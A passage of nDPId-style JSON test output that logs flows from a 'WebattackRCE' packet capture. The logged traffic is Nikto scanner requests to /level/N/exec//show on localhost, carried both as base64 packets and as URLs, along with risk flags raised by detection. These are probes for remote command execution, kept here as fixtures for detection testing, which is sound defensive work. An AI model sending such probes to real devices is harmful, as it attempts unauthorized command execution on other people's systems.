{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/26\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001273)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1576420277598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277598,"pkt":"AAAAAAAAAAAAAAAACABFAADIuK1AAEAGg4B\/AAABfwAAAcYYH5AkxYBd7ezrAoAYAED+vAAAAQEICp1m\/oadZv6GR0VUIC9sZXZlbC8yNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzQpDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/27\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001274)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1576420277600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277600,"pkt":"AAAAAAAAAAAAAAAACABFAADIQiNAAEAG+gp\/AAABfwAAAcYaH5DTCnrawy0BcYAYAED+vAAAAQEICp1m\/oidZv6IR0VUIC9sZXZlbC8yOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/28\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001275)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1576420277602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277602,"pkt":"AAAAAAAAAAAAAAAACABFAADIalZAAEAG0dd\/AAABfwAAAcYcH5BVA1KtKWKiFYAYAED+vAAAAQEICp1m\/oqdZv6JR0VUIC9sZXZlbC8yOS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/29\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001276)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1576420277604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277604,"pkt":"AAAAAAAAAAAAAAAACABFAADIeUZAAEAGwud\/AAABfwAAAcYeH5Dj\/UG+lxmHS4AYAED+vAAAAQEICp1m\/oudZv6LR0VUIC9sZXZlbC8zMC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/30\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001277)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1576420277607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277607,"pkt":"AAAAAAAAAAAAAAAACABFAADISctAAEAG8mJ\/AAABfwAAAcYgH5D3W3ExGI1+2IAYAED+vAAAAQEICp1m\/o6dZv6OR0VUIC9sZXZlbC8zMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzgpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/31\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001278)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1576420277608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277608,"pkt":"AAAAAAAAAAAAAAAACABFAADIARxAAEAGOxJ\/AAABfwAAAcYiH5DcsTnhkT\/ypIAYAED+vAAAAQEICp1m\/pCdZv6QR0VUIC9sZXZlbC8zMi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/32\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001279)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1576420277609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277609,"pkt":"AAAAAAAAAAAAAAAACABFAADIVW1AAEAG5sB\/AAABfwAAAcYkH5Dpym2S0+8SfoAYAED+vAAAAQEICp1m\/pGdZv6RR0VUIC9sZXZlbC8zMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjgwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/33\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001280)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1576420277611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277611,"pkt":"AAAAAAAAAAAAAAAACABFAADIEPFAAEAGKz1\/AAABfwAAAcYmH5CKoygWHO02yYAYAED+vAAAAQEICp1m\/pOdZv6TR0VUIC9sZXZlbC8zNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/34\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001281)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1576420277612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277612,"pkt":"AAAAAAAAAAAAAAAACABFAADILGdAAEAGD8d\/AAABfwAAAcYoH5DpvhSfS8jZeYAYAED+vAAAAQEICp1m\/pSdZv6UR0VUIC9sZXZlbC8zNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODIpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/35\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001282)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1576420277614,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277614,"pkt":"AAAAAAAAAAAAAAAACABFAADIgnNAAEAGubp\/AAABfwAAAcYqH5AJ3LqL6hJPloAYAED+vAAAAQEICp1m\/pWdZv6VR0VUIC9sZXZlbC8zNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/36\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001283)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1576420277615,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277615,"pkt":"AAAAAAAAAAAAAAAACABFAADIj29AAEAGrL5\/AAABfwAAAcYsH5DrNbeX8ap25oAYAED+vAAAAQEICp1m\/pedZv6XR0VUIC9sZXZlbC8zNy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 